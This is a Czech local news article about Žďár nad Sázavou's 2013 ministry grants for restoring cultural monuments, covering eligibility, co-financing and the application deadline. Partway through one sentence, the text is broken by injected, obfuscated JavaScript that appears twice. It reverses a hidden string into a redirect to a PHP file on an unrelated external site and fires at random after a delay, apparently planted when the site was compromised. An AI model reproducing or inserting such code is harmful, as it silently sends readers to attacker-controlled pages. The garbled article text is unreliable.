Žďár nad Sázavou, zdar nad sazavou, aktuality, památky, dotace
Rainbow page separator

Žďárská radnice vyhlásila dotace na památky

Pondělí, 28. ledna 2013

Žďár nad Sázavou / Celkem 558 tisíc korun je částka, která byla přidělena žďárskému úřadu v souvislosti s vyhlášením grantu ministerstva kultury pro rok 2013 na obnovu kulturních památek. O peníze mohou nyní žádat jejich vlastníci ze všech obcí, pro které je Žďár městem s rozšířenou působností III. stupně.

Finanční prostředky z programu jsou určeny na zachování a obnovu nemovitých kulturních památek, které se nacházejí mimo památkové rezervace a zóny a nejsou národními kulturními památkami. Také nesmí být ve vlastnictví státu. Dotace se nevztahuje ani na obnovu movité kulturní památky, jež je spojena s nějakou stavbou – kupříkladu varhany či oltáře v kostelech, pokud byly ty["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to stavby vyhlášeny kulturními památkami.

Minimální výše příspěvku z grantu, který Ministerstvo kultury ČR vyhlašuje od roku 2008, činí padesát tisíc korun, vlastník se musí na obnově památky sám podílet minimálně deseti procenty nákladů. Žádosti o grant mohou zájemci směřovat ke žďárskému odboru rozvoje a územního plánování do 28. února.